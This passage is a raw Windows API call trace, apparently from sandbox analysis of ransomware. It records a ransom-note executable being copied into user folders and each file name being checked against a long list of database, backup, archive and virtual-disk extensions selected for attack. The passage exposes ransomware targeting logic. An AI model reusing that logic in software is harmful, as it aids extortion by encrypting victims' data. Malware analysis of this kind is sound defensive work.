cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.349] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.349] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a71db00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.349] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.349] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2448 [0042.349] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbe58 | out: hHeap=0x2b0000) returned 1 [0042.349] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0042.350] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned 82 [0042.350] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0" [0042.350] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.350] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.350] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.350] GetLastError () returned 0x0 [0042.350] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.350] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.350] CloseHandle (hObject=0x118) returned 1 [0042.350] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.350] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.350] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a7b6080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a7b6080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.351] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.351] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.351] lstrcpyW (in: lpString1=0x2e2e906, lpString2="WMSDKNS.DTD" | out: lpString1="WMSDKNS.DTD") returned="WMSDKNS.DTD" [0042.351] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0042.351] lstrlenW (lpString="Ares865") returned 7 [0042.351] lstrcmpiW (lpString1="KNS.DTD", lpString2="Ares865") returned 1 [0042.351] lstrlenW (lpString=".dll") returned 4 [0042.351] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".dll") returned 1 [0042.351] lstrlenW (lpString=".lnk") returned 4 [0042.351] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".lnk") returned 1 [0042.351] lstrlenW (lpString=".ini") returned 4 [0042.351] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".ini") returned 1 [0042.351] lstrlenW (lpString=".sys") returned 4 [0042.351] lstrcmpiW (lpString1="WMSDKNS.DTD", lpString2=".sys") returned 1 [0042.351] lstrlenW (lpString="WMSDKNS.DTD") returned 11 [0042.351] lstrlenW (lpString="bak") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="bak") returned 1 [0042.351] lstrlenW (lpString="ba_") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="ba_") returned 1 [0042.351] lstrlenW (lpString="dbb") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="dbb") returned 1 [0042.351] lstrlenW (lpString="vmdk") returned 4 [0042.351] lstrcmpiW (lpString1=".DTD", lpString2="vmdk") returned -1 [0042.351] lstrlenW (lpString="rar") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="rar") returned -1 [0042.351] lstrlenW (lpString="zip") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="zip") returned -1 [0042.351] lstrlenW (lpString="tgz") returned 3 [0042.351] lstrcmpiW (lpString1="DTD", lpString2="tgz") returned -1 [0042.351] lstrlenW (lpString="vbox") returned 4 [0042.351] lstrcmpiW (lpString1=".DTD", lpString2="vbox") returned -1 [0042.351] lstrlenW (lpString="vdi") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="vdi") returned -1 [0042.352] lstrlenW (lpString="vhd") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="vhd") returned -1 [0042.352] lstrlenW (lpString="vhdx") returned 4 [0042.352] lstrcmpiW (lpString1=".DTD", lpString2="vhdx") returned -1 [0042.352] lstrlenW (lpString="avhd") returned 4 [0042.352] lstrcmpiW (lpString1=".DTD", lpString2="avhd") returned -1 [0042.352] lstrlenW (lpString="db") returned 2 [0042.352] lstrcmpiW (lpString1="TD", lpString2="db") returned 1 [0042.352] lstrlenW (lpString="db2") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="db2") returned 1 [0042.352] lstrlenW (lpString="db3") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="db3") returned 1 [0042.352] lstrlenW (lpString="dbf") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="dbf") returned 1 [0042.352] lstrlenW (lpString="mdf") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="mdf") returned -1 [0042.352] lstrlenW (lpString="mdb") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="mdb") returned -1 [0042.352] lstrlenW (lpString="sql") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="sql") returned -1 [0042.352] lstrlenW (lpString="sqlite") returned 6 [0042.352] lstrcmpiW (lpString1="NS.DTD", lpString2="sqlite") returned -1 [0042.352] lstrlenW (lpString="sqlite3") returned 7 [0042.352] lstrcmpiW (lpString1="KNS.DTD", lpString2="sqlite3") returned -1 [0042.352] lstrlenW (lpString="sqlitedb") returned 8 [0042.352] lstrcmpiW (lpString1="DKNS.DTD", lpString2="sqlitedb") returned -1 [0042.352] lstrlenW (lpString="xml") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="xml") returned -1 [0042.352] lstrlenW (lpString="$er") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="$er") returned 1 [0042.352] lstrlenW (lpString="4dd") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="4dd") returned 1 [0042.352] lstrlenW (lpString="4dl") returned 3 [0042.352] lstrcmpiW (lpString1="DTD", lpString2="4dl") returned 1 [0042.353] lstrlenW (lpString="^^^") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="^^^") returned 1 [0042.353] lstrlenW (lpString="abs") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="abs") returned 1 [0042.353] lstrlenW (lpString="abx") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="abx") returned 1 [0042.353] lstrlenW (lpString="accdb") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accdb") returned 1 [0042.353] lstrlenW (lpString="accdc") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accdc") returned 1 [0042.353] lstrlenW (lpString="accde") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accde") returned 1 [0042.353] lstrlenW (lpString="accdr") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accdr") returned 1 [0042.353] lstrlenW (lpString="accdt") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accdt") returned 1 [0042.353] lstrlenW (lpString="accdw") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accdw") returned 1 [0042.353] lstrlenW (lpString="accft") returned 5 [0042.353] lstrcmpiW (lpString1="S.DTD", lpString2="accft") returned 1 [0042.353] lstrlenW (lpString="adb") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="adb") returned 1 [0042.353] lstrlenW (lpString="adb") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="adb") returned 1 [0042.353] lstrlenW (lpString="ade") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="ade") returned 1 [0042.353] lstrlenW (lpString="adf") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="adf") returned 1 [0042.353] lstrlenW (lpString="adn") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="adn") returned 1 [0042.353] lstrlenW (lpString="adp") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="adp") returned 1 [0042.353] lstrlenW (lpString="alf") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="alf") returned 1 [0042.353] lstrlenW (lpString="ask") returned 3 [0042.353] lstrcmpiW (lpString1="DTD", lpString2="ask") returned 1 [0042.354] lstrlenW (lpString="btr") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="btr") returned 1 [0042.354] lstrlenW (lpString="cat") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="cat") returned 1 [0042.354] lstrlenW (lpString="cdb") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="cdb") returned 1 [0042.354] lstrlenW (lpString="ckp") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="ckp") returned 1 [0042.354] lstrlenW (lpString="cma") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="cma") returned 1 [0042.354] lstrlenW (lpString="cpd") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="cpd") returned 1 [0042.354] lstrlenW (lpString="dacpac") returned 6 [0042.354] lstrcmpiW (lpString1="NS.DTD", lpString2="dacpac") returned 1 [0042.354] lstrlenW (lpString="dad") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dad") returned 1 [0042.354] lstrlenW (lpString="dadiagrams") returned 10 [0042.354] lstrcmpiW (lpString1="MSDKNS.DTD", lpString2="dadiagrams") returned 1 [0042.354] lstrlenW (lpString="daschema") returned 8 [0042.354] lstrcmpiW (lpString1="DKNS.DTD", lpString2="daschema") returned 1 [0042.354] lstrlenW (lpString="db-journal") returned 10 [0042.354] lstrcmpiW (lpString1="MSDKNS.DTD", lpString2="db-journal") returned 1 [0042.354] lstrlenW (lpString="db-shm") returned 6 [0042.354] lstrcmpiW (lpString1="NS.DTD", lpString2="db-shm") returned 1 [0042.354] lstrlenW (lpString="db-wal") returned 6 [0042.354] lstrcmpiW (lpString1="NS.DTD", lpString2="db-wal") returned 1 [0042.354] lstrlenW (lpString="dbc") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dbc") returned 1 [0042.354] lstrlenW (lpString="dbs") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dbs") returned 1 [0042.354] lstrlenW (lpString="dbt") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dbt") returned 1 [0042.354] lstrlenW (lpString="dbv") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dbv") returned 1 [0042.354] lstrlenW (lpString="dbx") returned 3 [0042.354] lstrcmpiW (lpString1="DTD", lpString2="dbx") returned 1 [0042.355] lstrlenW (lpString="dcb") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dcb") returned 1 [0042.355] lstrlenW (lpString="dct") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dct") returned 1 [0042.355] lstrlenW (lpString="dcx") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dcx") returned 1 [0042.355] lstrlenW (lpString="ddl") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="ddl") returned 1 [0042.355] lstrlenW (lpString="dlis") returned 4 [0042.355] lstrcmpiW (lpString1=".DTD", lpString2="dlis") returned -1 [0042.355] lstrlenW (lpString="dp1") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dp1") returned 1 [0042.355] lstrlenW (lpString="dqy") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dqy") returned 1 [0042.355] lstrlenW (lpString="dsk") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dsk") returned 1 [0042.355] lstrlenW (lpString="dsn") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dsn") returned 1 [0042.355] lstrlenW (lpString="dtsx") returned 4 [0042.355] lstrcmpiW (lpString1=".DTD", lpString2="dtsx") returned -1 [0042.355] lstrlenW (lpString="dxl") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="dxl") returned -1 [0042.355] lstrlenW (lpString="eco") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="eco") returned -1 [0042.355] lstrlenW (lpString="ecx") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="ecx") returned -1 [0042.355] lstrlenW (lpString="edb") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="edb") returned -1 [0042.355] lstrlenW (lpString="epim") returned 4 [0042.355] lstrcmpiW (lpString1=".DTD", lpString2="epim") returned -1 [0042.355] lstrlenW (lpString="fcd") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="fcd") returned -1 [0042.355] lstrlenW (lpString="fdb") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="fdb") returned -1 [0042.355] lstrlenW (lpString="fic") returned 3 [0042.355] lstrcmpiW (lpString1="DTD", lpString2="fic") returned -1 [0042.356] lstrlenW (lpString="flexolibrary") returned 12 [0042.356] lstrlenW (lpString="fm5") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fm5") returned -1 [0042.356] lstrlenW (lpString="fmp") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fmp") returned -1 [0042.356] lstrlenW (lpString="fmp12") returned 5 [0042.356] lstrcmpiW (lpString1="S.DTD", lpString2="fmp12") returned 1 [0042.356] lstrlenW (lpString="fmpsl") returned 5 [0042.356] lstrcmpiW (lpString1="S.DTD", lpString2="fmpsl") returned 1 [0042.356] lstrlenW (lpString="fol") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fol") returned -1 [0042.356] lstrlenW (lpString="fp3") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fp3") returned -1 [0042.356] lstrlenW (lpString="fp4") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fp4") returned -1 [0042.356] lstrlenW (lpString="fp5") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fp5") returned -1 [0042.356] lstrlenW (lpString="fp7") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fp7") returned -1 [0042.356] lstrlenW (lpString="fpt") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="fpt") returned -1 [0042.356] lstrlenW (lpString="frm") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="frm") returned -1 [0042.356] lstrlenW (lpString="gdb") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="gdb") returned -1 [0042.356] lstrlenW (lpString="gdb") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="gdb") returned -1 [0042.356] lstrlenW (lpString="grdb") returned 4 [0042.356] lstrcmpiW (lpString1=".DTD", lpString2="grdb") returned -1 [0042.356] lstrlenW (lpString="gwi") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="gwi") returned -1 [0042.356] lstrlenW (lpString="hdb") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="hdb") returned -1 [0042.356] lstrlenW (lpString="his") returned 3 [0042.356] lstrcmpiW (lpString1="DTD", lpString2="his") returned -1 [0042.356] lstrlenW (lpString="ib") returned 2 [0042.357] lstrcmpiW (lpString1="TD", lpString2="ib") returned 1 [0042.357] lstrlenW (lpString="idb") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="idb") returned -1 [0042.357] lstrlenW (lpString="ihx") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="ihx") returned -1 [0042.357] lstrlenW (lpString="itdb") returned 4 [0042.357] lstrcmpiW (lpString1=".DTD", lpString2="itdb") returned -1 [0042.357] lstrlenW (lpString="itw") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="itw") returned -1 [0042.357] lstrlenW (lpString="jet") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="jet") returned -1 [0042.357] lstrlenW (lpString="jtx") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="jtx") returned -1 [0042.357] lstrlenW (lpString="kdb") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="kdb") returned -1 [0042.357] lstrlenW (lpString="kexi") returned 4 [0042.357] lstrcmpiW (lpString1=".DTD", lpString2="kexi") returned -1 [0042.357] lstrlenW (lpString="kexic") returned 5 [0042.357] lstrcmpiW (lpString1="S.DTD", lpString2="kexic") returned 1 [0042.357] lstrlenW (lpString="kexis") returned 5 [0042.357] lstrcmpiW (lpString1="S.DTD", lpString2="kexis") returned 1 [0042.357] lstrlenW (lpString="lgc") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="lgc") returned -1 [0042.357] lstrlenW (lpString="lwx") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="lwx") returned -1 [0042.357] lstrlenW (lpString="maf") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="maf") returned -1 [0042.357] lstrlenW (lpString="maq") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="maq") returned -1 [0042.357] lstrlenW (lpString="mar") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="mar") returned -1 [0042.357] lstrlenW (lpString="marshal") returned 7 [0042.357] lstrcmpiW (lpString1="KNS.DTD", lpString2="marshal") returned -1 [0042.357] lstrlenW (lpString="mas") returned 3 [0042.357] lstrcmpiW (lpString1="DTD", lpString2="mas") returned -1 [0042.357] lstrlenW (lpString="mav") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mav") returned -1 [0042.358] lstrlenW (lpString="maw") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="maw") returned -1 [0042.358] lstrlenW (lpString="mdbhtml") returned 7 [0042.358] lstrcmpiW (lpString1="KNS.DTD", lpString2="mdbhtml") returned -1 [0042.358] lstrlenW (lpString="mdn") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mdn") returned -1 [0042.358] lstrlenW (lpString="mdt") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mdt") returned -1 [0042.358] lstrlenW (lpString="mfd") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mfd") returned -1 [0042.358] lstrlenW (lpString="mpd") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mpd") returned -1 [0042.358] lstrlenW (lpString="mrg") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mrg") returned -1 [0042.358] lstrlenW (lpString="mud") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mud") returned -1 [0042.358] lstrlenW (lpString="mwb") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="mwb") returned -1 [0042.358] lstrlenW (lpString="myd") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="myd") returned -1 [0042.358] lstrlenW (lpString="ndf") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="ndf") returned -1 [0042.358] lstrlenW (lpString="nnt") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="nnt") returned -1 [0042.358] lstrlenW (lpString="nrmlib") returned 6 [0042.358] lstrcmpiW (lpString1="NS.DTD", lpString2="nrmlib") returned 1 [0042.358] lstrlenW (lpString="ns2") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="ns2") returned -1 [0042.358] lstrlenW (lpString="ns3") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="ns3") returned -1 [0042.358] lstrlenW (lpString="ns4") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="ns4") returned -1 [0042.358] lstrlenW (lpString="nsf") returned 3 [0042.358] lstrcmpiW (lpString1="DTD", lpString2="nsf") returned -1 [0042.358] lstrlenW (lpString="nv") returned 2 [0042.359] lstrcmpiW (lpString1="TD", lpString2="nv") returned 1 [0042.359] lstrlenW (lpString="nv2") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="nv2") returned -1 [0042.359] lstrlenW (lpString="nwdb") returned 4 [0042.359] lstrcmpiW (lpString1=".DTD", lpString2="nwdb") returned -1 [0042.359] lstrlenW (lpString="nyf") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="nyf") returned -1 [0042.359] lstrlenW (lpString="odb") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="odb") returned -1 [0042.359] lstrlenW (lpString="odb") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="odb") returned -1 [0042.359] lstrlenW (lpString="oqy") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="oqy") returned -1 [0042.359] lstrlenW (lpString="ora") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="ora") returned -1 [0042.359] lstrlenW (lpString="orx") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="orx") returned -1 [0042.359] lstrlenW (lpString="owc") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="owc") returned -1 [0042.359] lstrlenW (lpString="p96") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="p96") returned -1 [0042.359] lstrlenW (lpString="p97") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="p97") returned -1 [0042.359] lstrlenW (lpString="pan") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="pan") returned -1 [0042.359] lstrlenW (lpString="pdb") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="pdb") returned -1 [0042.359] lstrlenW (lpString="pdm") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="pdm") returned -1 [0042.359] lstrlenW (lpString="pnz") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="pnz") returned -1 [0042.359] lstrlenW (lpString="qry") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="qry") returned -1 [0042.359] lstrlenW (lpString="qvd") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="qvd") returned -1 [0042.359] lstrlenW (lpString="rbf") returned 3 [0042.359] lstrcmpiW (lpString1="DTD", lpString2="rbf") returned -1 [0042.360] lstrlenW (lpString="rctd") returned 4 [0042.360] lstrcmpiW (lpString1=".DTD", lpString2="rctd") returned -1 [0042.360] lstrlenW (lpString="rod") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="rod") returned -1 [0042.360] lstrlenW (lpString="rodx") returned 4 [0042.360] lstrcmpiW (lpString1=".DTD", lpString2="rodx") returned -1 [0042.360] lstrlenW (lpString="rpd") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="rpd") returned -1 [0042.360] lstrlenW (lpString="rsd") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="rsd") returned -1 [0042.360] lstrlenW (lpString="sas7bdat") returned 8 [0042.360] lstrcmpiW (lpString1="DKNS.DTD", lpString2="sas7bdat") returned -1 [0042.360] lstrlenW (lpString="sbf") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="sbf") returned -1 [0042.360] lstrlenW (lpString="scx") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="scx") returned -1 [0042.360] lstrlenW (lpString="sdb") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="sdb") returned -1 [0042.360] lstrlenW (lpString="sdc") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="sdc") returned -1 [0042.360] lstrlenW (lpString="sdf") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="sdf") returned -1 [0042.360] lstrlenW (lpString="sis") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="sis") returned -1 [0042.360] lstrlenW (lpString="spq") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="spq") returned -1 [0042.360] lstrlenW (lpString="te") returned 2 [0042.360] lstrcmpiW (lpString1="TD", lpString2="te") returned -1 [0042.360] lstrlenW (lpString="teacher") returned 7 [0042.360] lstrcmpiW (lpString1="KNS.DTD", lpString2="teacher") returned -1 [0042.360] lstrlenW (lpString="tmd") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="tmd") returned -1 [0042.360] lstrlenW (lpString="tps") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="tps") returned -1 [0042.360] lstrlenW (lpString="trc") returned 3 [0042.360] lstrcmpiW (lpString1="DTD", lpString2="trc") returned -1 [0042.361] lstrlenW (lpString="trc") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="trc") returned -1 [0042.361] lstrlenW (lpString="trm") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="trm") returned -1 [0042.361] lstrlenW (lpString="udb") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="udb") returned -1 [0042.361] lstrlenW (lpString="udl") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="udl") returned -1 [0042.361] lstrlenW (lpString="usr") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="usr") returned -1 [0042.361] lstrlenW (lpString="v12") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="v12") returned -1 [0042.361] lstrlenW (lpString="vis") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="vis") returned -1 [0042.361] lstrlenW (lpString="vpd") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="vpd") returned -1 [0042.361] lstrlenW (lpString="vvv") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="vvv") returned -1 [0042.361] lstrlenW (lpString="wdb") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="wdb") returned -1 [0042.361] lstrlenW (lpString="wmdb") returned 4 [0042.361] lstrcmpiW (lpString1=".DTD", lpString2="wmdb") returned -1 [0042.361] lstrlenW (lpString="wrk") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="wrk") returned -1 [0042.361] lstrlenW (lpString="xdb") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="xdb") returned -1 [0042.361] lstrlenW (lpString="xld") returned 3 [0042.361] lstrcmpiW (lpString1="DTD", lpString2="xld") returned -1 [0042.361] lstrlenW (lpString="xmlff") returned 5 [0042.361] lstrcmpiW (lpString1="S.DTD", lpString2="xmlff") returned -1 [0042.361] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, 